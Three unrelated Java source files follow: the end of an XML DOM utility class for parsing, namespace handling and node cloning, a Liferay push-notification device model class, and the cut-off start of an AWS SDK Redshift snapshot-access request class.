localName = nodeName.substring(0, colonIndex);
namespaceUri = nodeName.substring(colonIndex + 1);
} else {
localName = nodeName;
namespaceUri = null;
}
}
return new QName(namespaceUri, localName);
}
public static QName getNodeQName(String qualifiedName) {
int index = qualifiedName.indexOf(":");
if (index >= 0) {
return new QName(qualifiedName.substring(0, index), qualifiedName.substring(index + 1));
} else {
return new QName(qualifiedName);
}
}
/**
* Remove the child nodes under another node.
* @param target the <code>Node</code> to remove the children from.
*/
public static void removeChildren(Node target) {
while (target.hasChildNodes()) {
target.removeChild(target.getFirstChild());
}
}
/**
* Drop the attributes from an element, except possibly an <code>xmlns</code>
* attribute that declares its namespace.
* @param target the element whose attributes will be removed.
* @param flag preserve namespace declaration
*/
public static void removeAttributes(Element target, boolean flag) {
if (!target.hasAttributes()) {
return;
}
String prefix = target.getPrefix();
NamedNodeMap nnm = target.getAttributes();
Attr toPutBack = null;
if (flag) {
if (prefix== null) {
toPutBack = target.getAttributeNodeNS(NS_URI_XMLNS,"xmlns");
} else {
toPutBack = target.getAttributeNodeNS(NS_URI_XMLNS,"xmlns:" + prefix);
}
}
while(nnm.getLength() != 0) {
target.removeAttributeNode((Attr) nnm.item(0));
}
if (toPutBack != null) {
target.setAttributeNodeNS(toPutBack);
}
}
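    /**
     * Illustrative sketch (not part of the original API): strip attributes while
     * keeping the element's own namespace declaration. The XML literal and method
     * name are hypothetical.
     */
    private static Element exampleRemoveAttributes() throws SAXException, IOException {
        Element el = stringToDOM(
            "<t:item xmlns:t=\"urn:example\" version=\"1\" deprecated=\"true\"/>");
        // With flag=true the xmlns:t declaration is put back after the sweep.
        removeAttributes(el, true);
        return el;
    }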
public static Element findChildByName(Element parent, QName name) {
return findChildByName(parent, name, false);
}
public static Element findChildByName(Element parent, QName name, boolean recurse) {
if (parent == null)
throw new IllegalArgumentException("null parent");
if (name == null)
throw new IllegalArgumentException("null name");
NodeList nl = parent.getChildNodes();
for (int i = 0; i < nl.getLength(); ++i) {
Node c = nl.item(i);
if(c.getNodeType() != Node.ELEMENT_NODE)
continue;
// For a reason that I can't fathom, when using in-mem DAO we actually get elements with
// no localname.
String nodeName = c.getLocalName() != null ? c.getLocalName() : c.getNodeName();
if (new QName(c.getNamespaceURI(),nodeName).equals(name))
return (Element) c;
}
if(recurse){
NodeList cnl = parent.getChildNodes();
for (int i = 0; i < cnl.getLength(); ++i) {
Node c = cnl.item(i);
if(c.getNodeType() != Node.ELEMENT_NODE)
continue;
Element result = findChildByName((Element)c, name, recurse);
if(result != null)
return result;
}
}
return null;
}
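    /**
     * Illustrative sketch (not part of the original API): locate a namespaced
     * child element by its QName. The XML literal and method name are hypothetical.
     */
    private static Element exampleFindChildByName() throws SAXException, IOException {
        Element root = stringToDOM(
            "<root xmlns:t=\"urn:example\"><t:child/></root>");
        // Matches on namespace URI + local name, regardless of the prefix used.
        return findChildByName(root, new QName("urn:example", "child"));
    }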
public static Node findChildByType(Element elem, int type) {
if (elem == null)
throw new NullPointerException("elem parameter must not be null!");
for (Node n = elem.getFirstChild(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == type) {
return n;
}
}
return null;
}
public static String getTextContent(Node node) {
for (int m = 0; m < node.getChildNodes().getLength(); m++) {
Node child = node.getChildNodes().item(m);
if (child.getNodeType() == Node.TEXT_NODE) {
String childText = child.getNodeValue().trim();
if (childText.length() > 0) return childText;
}
}
return null;
}
public static Element getElementContent(Node node) {
for (int m = 0; m < node.getChildNodes().getLength(); m++) {
Node child = node.getChildNodes().item(m);
if (child.getNodeType() == Node.ELEMENT_NODE) return (Element) child;
}
return null;
}
public static void injectNamespaces(Element domElement, NSContext nscontext) {
for (String uri : nscontext.getUriSet()) {
String prefix = nscontext.getPrefix(uri);
if (prefix == null || "".equals(prefix))
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns", uri);
else
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns:"+ prefix, uri);
}
}
/**
* Adds namespaces including all prefixes.
* This is needed for correct handling of xsi:type attributes.
     * @param domElement An element to which the namespace attributes should be added.
* @param nscontext A namespace context.
* @author k.petrauskas
*/
public static void injectNamespacesWithAllPrefixes(Element domElement, NSContext nscontext) {
if (__log.isDebugEnabled())
__log.debug("injectNamespacesWithAllPrefixes: element=" + domToString(domElement) + " nscontext=" + nscontext);
for (Map.Entry<String, String> entry : nscontext.toMap().entrySet()) {
String prefix = entry.getKey();
String uri = entry.getValue();
if (prefix == null || "".equals(prefix))
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns", uri);
else
domElement.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns:"+ prefix, uri);
if (__log.isDebugEnabled())
__log.debug("injectNamespacesWithAllPrefixes: added namespace: prefix=\"" + prefix + "\" uri=\"" + uri + "\"");
}
if (__log.isDebugEnabled())
__log.debug("injectNamespacesWithAllPrefixes: result: element=" + domToString(domElement));
}
public static void copyNSContext(Element source, Element dest) {
Map<String, String> sourceNS = getParentNamespaces(source);
sourceNS.putAll(getMyNamespaces(source));
Map<String, String> destNS = getParentNamespaces(dest);
destNS.putAll(getMyNamespaces(dest));
// (source - dest) to avoid adding twice the same ns on dest
for (String pr : destNS.keySet()) sourceNS.remove(pr);
for (Map.Entry<String, String> entry : sourceNS.entrySet()) {
String prefix = entry.getKey();
String uri = entry.getValue();
if (prefix == null || "".equals(prefix))
dest.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns", uri);
else
dest.setAttributeNS(DOMUtils.NS_URI_XMLNS, "xmlns:"+ prefix, uri);
}
}
public static Document toDOMDocument(Node node) throws TransformerException {
// If the node is the document, just cast it
if (node instanceof Document) {
return (Document) node;
// If the node is an element
} else if (node instanceof Element) {
Element elem = (Element) node;
// If this is the root element, return its owner document
if (elem.getOwnerDocument().getDocumentElement() == elem) {
return elem.getOwnerDocument();
// else, create a new doc and copy the element inside it
} else {
Document doc = newDocument();
doc.appendChild(doc.importNode(node, true));
return doc;
}
// other element types are not handled
} else {
throw new TransformerException("Unable to convert DOM node to a Document");
}
}
public static Document toDocumentFromStream(StreamSource source) throws IOException, SAXException {
DocumentBuilder builder = getBuilder();
Document document = null;
Reader reader = source.getReader();
if (reader != null) {
document = builder.parse(new InputSource(reader));
} else {
InputStream inputStream = source.getInputStream();
if (inputStream != null) {
InputSource inputsource = new InputSource(inputStream);
inputsource.setSystemId( source.getSystemId() );
document = builder.parse(inputsource);
}
else {
throw new IOException("No input stream or reader available");
}
}
return document;
}
// sadly, as of JDK 5.0 IOException still doesn't support new IOException(Throwable)
private static void throwIOException(Throwable t) throws IOException {
IOException e = new IOException(t.getMessage());
e.setStackTrace(t.getStackTrace());
throw e;
}
public static Document parse(XMLStreamReader reader)
throws XMLStreamException
{
Document doc = newDocument();
parse(reader, doc, doc);
return doc;
}
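    /**
     * Illustrative sketch (not part of the original API): build a DOM document
     * from a StAX reader. The XML literal and method name are hypothetical.
     */
    private static Document exampleParseFromStax() throws XMLStreamException {
        XMLStreamReader reader = javax.xml.stream.XMLInputFactory.newInstance()
            .createXMLStreamReader(new StringReader("<doc><item/></doc>"));
        // Walks the StAX events and mirrors them into a new DOM document.
        return parse(reader);
    }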
private static void parse(XMLStreamReader reader, Document doc, Node parent)
throws XMLStreamException
{
int event = reader.getEventType();
while (reader.hasNext()) {
switch (event) {
case XMLStreamConstants.START_ELEMENT:
// create element
Element e = doc.createElementNS(reader.getNamespaceURI(), reader.getLocalName());
                    if (reader.getPrefix() != null && !"".equals(reader.getPrefix())) {
e.setPrefix(reader.getPrefix());
}
parent.appendChild(e);
// copy namespaces
for (int ns = 0; ns < reader.getNamespaceCount(); ns++) {
String uri = reader.getNamespaceURI(ns);
String prefix = reader.getNamespacePrefix(ns);
declare(e, uri, prefix);
}
// copy attributes
for (int att = 0; att < reader.getAttributeCount(); att++) {
String name = reader.getAttributeLocalName(att);
String prefix = reader.getAttributePrefix(att);
if (prefix != null && prefix.length() > 0) {
name = prefix + ":" + name;
}
Attr attr = doc.createAttributeNS(reader.getAttributeNamespace(att), name);
attr.setValue(reader.getAttributeValue(att));
e.setAttributeNode(attr);
}
// sub-nodes
if (reader.hasNext()) {
reader.next();
parse(reader, doc, e);
}
if (parent instanceof Document) {
while (reader.hasNext()) reader.next();
return;
}
break;
case XMLStreamConstants.END_ELEMENT:
return;
case XMLStreamConstants.CHARACTERS:
if (parent != null) {
parent.appendChild(doc.createTextNode(reader.getText()));
}
break;
case XMLStreamConstants.COMMENT:
if (parent != null) {
parent.appendChild(doc.createComment(reader.getText()));
}
break;
case XMLStreamConstants.CDATA:
parent.appendChild(doc.createCDATASection(reader.getText()));
break;
case XMLStreamConstants.PROCESSING_INSTRUCTION:
parent.appendChild(doc.createProcessingInstruction(reader.getPITarget(), reader.getPIData()));
break;
                case XMLStreamConstants.ENTITY_REFERENCE:
                    // An entity reference is not a processing instruction; create the proper node type.
                    parent.appendChild(doc.createEntityReference(reader.getLocalName()));
                    break;
case XMLStreamConstants.NAMESPACE:
case XMLStreamConstants.ATTRIBUTE:
break;
default:
break;
}
if (reader.hasNext()) {
event = reader.next();
}
}
}
private static void declare(Element node, String uri, String prefix) {
if (prefix != null && prefix.length() > 0) {
node.setAttributeNS(NS_URI_XMLNS, "xmlns:" + prefix, uri);
} else {
if (uri != null) {
node.setAttributeNS(NS_URI_XMLNS, "xmlns", uri);
}
}
}
private static Transformer getTransformer() {
Transformer txer = __txers.get();
if (txer == null) {
synchronized(_transformerFactory) {
try {
txer = _transformerFactory.newTransformer();
} catch (TransformerConfigurationException e) {
String errmsg = "Transformer configuration error!";
__log.error(errmsg, e);
throw new Error(errmsg, e);
}
}
__txers.set(txer);
}
return txer;
}
private static DocumentBuilder getBuilder() {
DocumentBuilder builder = __builders.get();
if (builder == null) {
synchronized (__documentBuilderFactory) {
try {
builder = __documentBuilderFactory.newDocumentBuilder();
builder.setErrorHandler(new LoggingErrorHandler());
} catch (ParserConfigurationException e) {
__log.error("",e);
throw new RuntimeException(e);
}
}
__builders.set(builder);
}
return builder;
}
public static List<Element> findChildrenByName(Element parent, QName name) {
if (parent == null)
throw new IllegalArgumentException("null parent");
if (name == null)
throw new IllegalArgumentException("null name");
LinkedList<Element> ret = new LinkedList<Element>();
NodeList nl = parent.getChildNodes();
for (int i = 0; i < nl.getLength(); ++i) {
Node c = nl.item(i);
if(c.getNodeType() != Node.ELEMENT_NODE)
continue;
// For a reason that I can't fathom, when using in-mem DAO we actually get elements with
// no localname.
String nodeName = c.getLocalName() != null ? c.getLocalName() : c.getNodeName();
if (new QName(c.getNamespaceURI(),nodeName).equals(name))
ret.add((Element)c);
}
return ret;
}
/**
* Somewhat eases the pain of dealing with both Lists and Nodelists by converting either
* passed as parameter to a List.
* @param nl a NodeList or a List
* @return a List
*/
public static List<Node> toList(Object nl) {
if (nl == null) return null;
if (nl instanceof List) return (List<Node>) nl;
NodeList cnl = (NodeList) nl;
List<Node> ll = new ArrayList<Node>();
for (int m = 0; m < cnl.getLength(); m++) ll.add(cnl.item(m));
return ll;
}
public static Document getDocument(Node contextNode) {
return (contextNode == null) ? DOMUtils.newDocument() : contextNode.getOwnerDocument();
}
public static String getQualifiedName(QName qName) {
String prefix = qName.getPrefix(), localPart = qName.getLocalPart();
return (prefix == null || "".equals(prefix)) ? localPart : (prefix + ":" + localPart);
}
    /**
     * Deep clone, but don't fry, the given node in the context of the given document.
     * For all intents and purposes, the clone is an exact copy of the node,
     * except that it might have a different owner document.
     *
     * This method is fool-proof, unlike the <code>adoptNode</code> or <code>importNode</code> methods,
     * in that it doesn't assume that the given node has a parent or an owner document.
     *
     * @param document the document that will own the clone
     * @param sourceNode the node to clone
     * @return a clone of the node
     */
public static Node cloneNode(Document document, Node sourceNode) {
Node clonedNode = null;
// what is my name?
QName sourceQName = getNodeQName(sourceNode);
String nodeName = sourceQName.getLocalPart();
String namespaceURI = sourceQName.getNamespaceURI();
// if the node is unqualified, don't assume that it inherits the WS-BPEL target namespace
if (Namespaces.WSBPEL2_0_FINAL_EXEC.equals(namespaceURI)) {
namespaceURI = null;
}
switch (sourceNode.getNodeType()) {
case Node.ATTRIBUTE_NODE:
if (namespaceURI == null) {
clonedNode = document.createAttribute(nodeName);
} else {
String prefix = ((Attr) sourceNode).lookupPrefix(namespaceURI);
// the prefix for the XML namespace can't be looked up, hence this...
if (prefix == null && namespaceURI.equals(NS_URI_XMLNS)) {
prefix = "xmlns";
}
// if a prefix exists, qualify the name with it
if (prefix != null && !"".equals(prefix)) {
nodeName = prefix + ":" + nodeName;
}
// create the appropriate type of attribute
if (prefix != null) {
clonedNode = document.createAttributeNS(namespaceURI, nodeName);
} else {
clonedNode = document.createAttribute(nodeName);
}
}
break;
case Node.CDATA_SECTION_NODE:
clonedNode = document.createCDATASection(((CDATASection) sourceNode).getData());
break;
case Node.COMMENT_NODE:
clonedNode = document.createComment(((Comment) sourceNode).getData());
break;
case Node.DOCUMENT_FRAGMENT_NODE:
clonedNode = document.createDocumentFragment();
break;
case Node.DOCUMENT_NODE:
clonedNode = document;
break;
case Node.ELEMENT_NODE:
// create the appropriate type of element
if (namespaceURI == null) {
clonedNode = document.createElement(nodeName);
} else {
String prefix = namespaceURI.equals(Namespaces.XMLNS_URI) ?
"xmlns" : ((Element) sourceNode).lookupPrefix(namespaceURI);
if (prefix != null && !"".equals(prefix)) {
nodeName = prefix + ":" + nodeName;
clonedNode = document.createElementNS(namespaceURI, nodeName);
} else {
clonedNode = document.createElement(nodeName);
}
}
// attributes are not treated as child nodes, so copy them explicitly
NamedNodeMap attributes = ((Element) sourceNode).getAttributes();
for (int i = 0; i < attributes.getLength(); i++) {
Attr attributeClone = (Attr) cloneNode(document, attributes.item(i));
if (attributeClone.getNamespaceURI() == null) {
((Element) clonedNode).setAttributeNode(attributeClone);
} else {
((Element) clonedNode).setAttributeNodeNS(attributeClone);
}
}
break;
case Node.ENTITY_NODE:
// TODO
break;
case Node.ENTITY_REFERENCE_NODE:
clonedNode = document.createEntityReference(nodeName);
// TODO
break;
case Node.NOTATION_NODE:
// TODO
break;
case Node.PROCESSING_INSTRUCTION_NODE:
                // createProcessingInstruction expects (target, data); the node name is the PI target.
                clonedNode = document.createProcessingInstruction(nodeName, ((ProcessingInstruction) sourceNode).getData());
break;
case Node.TEXT_NODE:
clonedNode = document.createTextNode(((Text) sourceNode ).getData());
break;
default:
break;
}
// clone children of element and attribute nodes
NodeList sourceChildren = sourceNode.getChildNodes();
if (sourceChildren != null) {
for (int i = 0; i < sourceChildren.getLength(); i++) {
Node sourceChild = sourceChildren.item(i);
Node clonedChild = cloneNode(document, sourceChild);
clonedNode.appendChild(clonedChild);
// if the child has a textual value, parse it for any embedded prefixes
if (clonedChild.getNodeType() == Node.TEXT_NODE ||
clonedChild.getNodeType() == Node.CDATA_SECTION_NODE) {
parseEmbeddedPrefixes(sourceNode, clonedNode, clonedChild);
}
}
}
return clonedNode;
}
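    /**
     * Illustrative sketch (not part of the original API): clone a namespaced
     * element into a freshly created document. The XML literal and method name
     * are hypothetical.
     */
    private static Node exampleCloneNode() throws SAXException, IOException {
        Element src = stringToDOM("<p:item xmlns:p=\"urn:example\">42</p:item>");
        // The clone keeps the qualified name, namespace and children of the source.
        return cloneNode(newDocument(), src);
    }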
    /**
     * Parse the text of the cloned child for any embedded prefixes and declare
     * them on its parent element.
     *
     * @param sourceNode the original node the prefixes are looked up against
     * @param clonedNode the cloned parent that receives the declarations
     * @param clonedChild the cloned text/CDATA child whose value is scanned
     */
private static void parseEmbeddedPrefixes(Node sourceNode, Node clonedNode, Node clonedChild) {
Element clonedElement = null;
if (clonedNode instanceof Attr) {
clonedElement = ((Attr) clonedNode).getOwnerElement();
} else if (clonedNode instanceof Element) {
clonedElement = (Element) clonedNode;
}
if (clonedElement == null) {
// couldn't find an element to set prefixes on, so bail out
return;
}
String text = ((Text) clonedChild).getNodeValue();
if (text != null && text.indexOf(":") > 0) {
Name11Checker nameChecker = Name11Checker.getInstance();
for (int colonIndex = text.indexOf(":"); colonIndex != -1 && colonIndex < text.length(); colonIndex = text.indexOf(":", colonIndex + 1)) {
StringBuffer prefixString = new StringBuffer();
for (int prefixIndex = colonIndex - 1;
prefixIndex >= 0 && nameChecker.isNCNameChar(text.charAt(prefixIndex));
prefixIndex--) {
prefixString.append(text.charAt(prefixIndex));
}
prefixString.reverse();
if (prefixString.length() > 0) {
String uri = sourceNode.lookupNamespaceURI(prefixString.toString());
if (uri != null) {
clonedElement.setAttributeNS(NS_URI_XMLNS, "xmlns:" + prefixString, uri);
}
}
}
}
}
public static Element stringToDOM(byte[] bytes) throws SAXException, IOException {
return stringToDOM(new String(bytes));
}
public static byte[] domToBytes(Element element) {
String stringifiedElement = domToString(element);
return (stringifiedElement != null) ? stringifiedElement.getBytes() : null;
}
}
|
|
package com.liferay.pushnotifications.model;
import com.liferay.portal.kernel.bean.AutoEscapeBeanHandler;
import com.liferay.portal.kernel.exception.SystemException;
import com.liferay.portal.kernel.util.ProxyUtil;
import com.liferay.portal.kernel.util.StringBundler;
import com.liferay.portal.model.BaseModel;
import com.liferay.portal.model.impl.BaseModelImpl;
import com.liferay.portal.util.PortalUtil;
import com.liferay.pushnotifications.service.ClpSerializer;
import com.liferay.pushnotifications.service.PushNotificationsDeviceLocalServiceUtil;
import java.io.Serializable;
import java.lang.reflect.Method;
import java.util.Date;
import java.util.HashMap;
import java.util.Map;
public class PushNotificationsDeviceClp extends BaseModelImpl<PushNotificationsDevice>
implements PushNotificationsDevice {
private long _pushNotificationsDeviceId;
private long _userId;
private String _userUuid;
private Date _createDate;
private String _platform;
private String _token;
private String _model;
private String _OSVersion;
private long _appId;
private String _appVersion;
private BaseModel<?> _pushNotificationsDeviceRemoteModel;
private Class<?> _clpSerializerClass = com.liferay.pushnotifications.service.ClpSerializer.class;
public PushNotificationsDeviceClp() {
}
@Override
public Class<?> getModelClass() {
return PushNotificationsDevice.class;
}
@Override
public String getModelClassName() {
return PushNotificationsDevice.class.getName();
}
@Override
public long getPrimaryKey() {
return _pushNotificationsDeviceId;
}
@Override
public void setPrimaryKey(long primaryKey) {
setPushNotificationsDeviceId(primaryKey);
}
@Override
public Serializable getPrimaryKeyObj() {
return _pushNotificationsDeviceId;
}
@Override
public void setPrimaryKeyObj(Serializable primaryKeyObj) {
setPrimaryKey(((Long) primaryKeyObj).longValue());
}
@Override
public Map<String, Object> getModelAttributes() {
Map<String, Object> attributes = new HashMap<String, Object>();
attributes.put("pushNotificationsDeviceId",
getPushNotificationsDeviceId());
attributes.put("userId", getUserId());
attributes.put("createDate", getCreateDate());
attributes.put("platform", getPlatform());
attributes.put("token", getToken());
attributes.put("model", getModel());
attributes.put("OSVersion", getOSVersion());
attributes.put("appId", getAppId());
attributes.put("appVersion", getAppVersion());
return attributes;
}
@Override
public void setModelAttributes(Map<String, Object> attributes) {
Long pushNotificationsDeviceId = (Long) attributes.get(
"pushNotificationsDeviceId");
if (pushNotificationsDeviceId != null) {
setPushNotificationsDeviceId(pushNotificationsDeviceId);
}
Long userId = (Long) attributes.get("userId");
if (userId != null) {
setUserId(userId);
}
Date createDate = (Date) attributes.get("createDate");
if (createDate != null) {
setCreateDate(createDate);
}
String platform = (String) attributes.get("platform");
if (platform != null) {
setPlatform(platform);
}
String token = (String) attributes.get("token");
if (token != null) {
setToken(token);
}
String model = (String) attributes.get("model");
if (model != null) {
setModel(model);
}
String OSVersion = (String) attributes.get("OSVersion");
if (OSVersion != null) {
setOSVersion(OSVersion);
}
Long appId = (Long) attributes.get("appId");
if (appId != null) {
setAppId(appId);
}
String appVersion = (String) attributes.get("appVersion");
if (appVersion != null) {
setAppVersion(appVersion);
}
}
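    /**
     * Illustrative sketch (not part of the generated model): populate a device
     * through the attribute map consumed by setModelAttributes. All values and
     * the method name are hypothetical.
     */
    private static PushNotificationsDeviceClp exampleFromAttributes() {
        PushNotificationsDeviceClp device = new PushNotificationsDeviceClp();
        Map<String, Object> attributes = new HashMap<String, Object>();
        attributes.put("userId", 20156L);
        attributes.put("platform", "android");
        attributes.put("token", "hypothetical-device-token");
        // Only keys present in the map are applied; other fields keep their defaults.
        device.setModelAttributes(attributes);
        return device;
    }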
@Override
public long getPushNotificationsDeviceId() {
return _pushNotificationsDeviceId;
}
@Override
public void setPushNotificationsDeviceId(long pushNotificationsDeviceId) {
_pushNotificationsDeviceId = pushNotificationsDeviceId;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setPushNotificationsDeviceId",
long.class);
method.invoke(_pushNotificationsDeviceRemoteModel,
pushNotificationsDeviceId);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public long getUserId() {
return _userId;
}
@Override
public void setUserId(long userId) {
_userId = userId;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setUserId", long.class);
method.invoke(_pushNotificationsDeviceRemoteModel, userId);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getUserUuid() throws SystemException {
return PortalUtil.getUserValue(getUserId(), "uuid", _userUuid);
}
@Override
public void setUserUuid(String userUuid) {
_userUuid = userUuid;
}
@Override
public Date getCreateDate() {
return _createDate;
}
@Override
public void setCreateDate(Date createDate) {
_createDate = createDate;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setCreateDate", Date.class);
method.invoke(_pushNotificationsDeviceRemoteModel, createDate);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getPlatform() {
return _platform;
}
@Override
public void setPlatform(String platform) {
_platform = platform;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setPlatform", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, platform);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getToken() {
return _token;
}
@Override
public void setToken(String token) {
_token = token;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setToken", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, token);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getModel() {
return _model;
}
@Override
public void setModel(String model) {
_model = model;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setModel", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, model);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getOSVersion() {
return _OSVersion;
}
@Override
public void setOSVersion(String OSVersion) {
_OSVersion = OSVersion;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setOSVersion", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, OSVersion);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public long getAppId() {
return _appId;
}
@Override
public void setAppId(long appId) {
_appId = appId;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setAppId", long.class);
method.invoke(_pushNotificationsDeviceRemoteModel, appId);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
@Override
public String getAppVersion() {
return _appVersion;
}
@Override
public void setAppVersion(String appVersion) {
_appVersion = appVersion;
if (_pushNotificationsDeviceRemoteModel != null) {
try {
Class<?> clazz = _pushNotificationsDeviceRemoteModel.getClass();
Method method = clazz.getMethod("setAppVersion", String.class);
method.invoke(_pushNotificationsDeviceRemoteModel, appVersion);
} catch (Exception e) {
throw new UnsupportedOperationException(e);
}
}
}
public BaseModel<?> getPushNotificationsDeviceRemoteModel() {
return _pushNotificationsDeviceRemoteModel;
}
public void setPushNotificationsDeviceRemoteModel(
BaseModel<?> pushNotificationsDeviceRemoteModel) {
_pushNotificationsDeviceRemoteModel = pushNotificationsDeviceRemoteModel;
}
public Object invokeOnRemoteModel(String methodName,
Class<?>[] parameterTypes, Object[] parameterValues)
throws Exception {
Object[] remoteParameterValues = new Object[parameterValues.length];
for (int i = 0; i < parameterValues.length; i++) {
if (parameterValues[i] != null) {
remoteParameterValues[i] = ClpSerializer.translateInput(parameterValues[i]);
}
}
Class<?> remoteModelClass = _pushNotificationsDeviceRemoteModel.getClass();
ClassLoader remoteModelClassLoader = remoteModelClass.getClassLoader();
Class<?>[] remoteParameterTypes = new Class[parameterTypes.length];
for (int i = 0; i < parameterTypes.length; i++) {
if (parameterTypes[i].isPrimitive()) {
remoteParameterTypes[i] = parameterTypes[i];
} else {
String parameterTypeName = parameterTypes[i].getName();
remoteParameterTypes[i] = remoteModelClassLoader.loadClass(parameterTypeName);
}
}
Method method = remoteModelClass.getMethod(methodName,
remoteParameterTypes);
Object returnValue = method.invoke(_pushNotificationsDeviceRemoteModel,
remoteParameterValues);
if (returnValue != null) {
returnValue = ClpSerializer.translateOutput(returnValue);
}
return returnValue;
}
@Override
public void persist() throws SystemException {
if (this.isNew()) {
PushNotificationsDeviceLocalServiceUtil.addPushNotificationsDevice(this);
} else {
PushNotificationsDeviceLocalServiceUtil.updatePushNotificationsDevice(this);
}
}
@Override
public PushNotificationsDevice toEscapedModel() {
return (PushNotificationsDevice) ProxyUtil.newProxyInstance(PushNotificationsDevice.class.getClassLoader(),
new Class[] { PushNotificationsDevice.class },
new AutoEscapeBeanHandler(this));
}
@Override
public Object clone() {
PushNotificationsDeviceClp clone = new PushNotificationsDeviceClp();
clone.setPushNotificationsDeviceId(getPushNotificationsDeviceId());
clone.setUserId(getUserId());
clone.setCreateDate(getCreateDate());
clone.setPlatform(getPlatform());
clone.setToken(getToken());
clone.setModel(getModel());
clone.setOSVersion(getOSVersion());
clone.setAppId(getAppId());
clone.setAppVersion(getAppVersion());
return clone;
}
@Override
public int compareTo(PushNotificationsDevice pushNotificationsDevice) {
long primaryKey = pushNotificationsDevice.getPrimaryKey();
if (getPrimaryKey() < primaryKey) {
return -1;
} else if (getPrimaryKey() > primaryKey) {
return 1;
} else {
return 0;
}
}
@Override
public boolean equals(Object obj) {
if (this == obj) {
return true;
}
if (!(obj instanceof PushNotificationsDeviceClp)) {
return false;
}
PushNotificationsDeviceClp pushNotificationsDevice = (PushNotificationsDeviceClp) obj;
long primaryKey = pushNotificationsDevice.getPrimaryKey();
if (getPrimaryKey() == primaryKey) {
return true;
} else {
return false;
}
}
public Class<?> getClpSerializerClass() {
return _clpSerializerClass;
}
@Override
public int hashCode() {
return (int) getPrimaryKey();
}
@Override
public String toString() {
StringBundler sb = new StringBundler(19);
sb.append("{pushNotificationsDeviceId=");
sb.append(getPushNotificationsDeviceId());
sb.append(", userId=");
sb.append(getUserId());
sb.append(", createDate=");
sb.append(getCreateDate());
sb.append(", platform=");
sb.append(getPlatform());
sb.append(", token=");
sb.append(getToken());
sb.append(", model=");
sb.append(getModel());
sb.append(", OSVersion=");
sb.append(getOSVersion());
sb.append(", appId=");
sb.append(getAppId());
sb.append(", appVersion=");
sb.append(getAppVersion());
sb.append("}");
return sb.toString();
}
@Override
public String toXmlString() {
StringBundler sb = new StringBundler(31);
sb.append("<model><model-name>");
sb.append("com.liferay.pushnotifications.model.PushNotificationsDevice");
sb.append("</model-name>");
sb.append(
"<column><column-name>pushNotificationsDeviceId</column-name><column-value><![CDATA[");
sb.append(getPushNotificationsDeviceId());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>userId</column-name><column-value><![CDATA[");
sb.append(getUserId());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>createDate</column-name><column-value><![CDATA[");
sb.append(getCreateDate());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>platform</column-name><column-value><![CDATA[");
sb.append(getPlatform());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>token</column-name><column-value><![CDATA[");
sb.append(getToken());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>model</column-name><column-value><![CDATA[");
sb.append(getModel());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>OSVersion</column-name><column-value><![CDATA[");
sb.append(getOSVersion());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>appId</column-name><column-value><![CDATA[");
sb.append(getAppId());
sb.append("]]></column-value></column>");
sb.append(
"<column><column-name>appVersion</column-name><column-value><![CDATA[");
sb.append(getAppVersion());
sb.append("]]></column-value></column>");
sb.append("</model>");
return sb.toString();
}
}
|
|
/*
* Copyright 2010-2016 Amazon.com, Inc. or its affiliates. All Rights
* Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package com.amazonaws.services.redshift.model;
import java.io.Serializable;
import com.amazonaws.AmazonWebServiceRequest;
/**
* <p>
* </p>
*/
public class RevokeSnapshotAccessRequest extends AmazonWebServiceRequest
implements Serializable, Cloneable {
/**
* <p>
* The identifier of the snapshot that the account can no longer access.
* </p>
*/
private String snapshotIdentifier;
/**
* <p>
* The identifier of the cluster the snapshot was created from. This
* parameter is required if your IAM user has a policy containing a snapshot
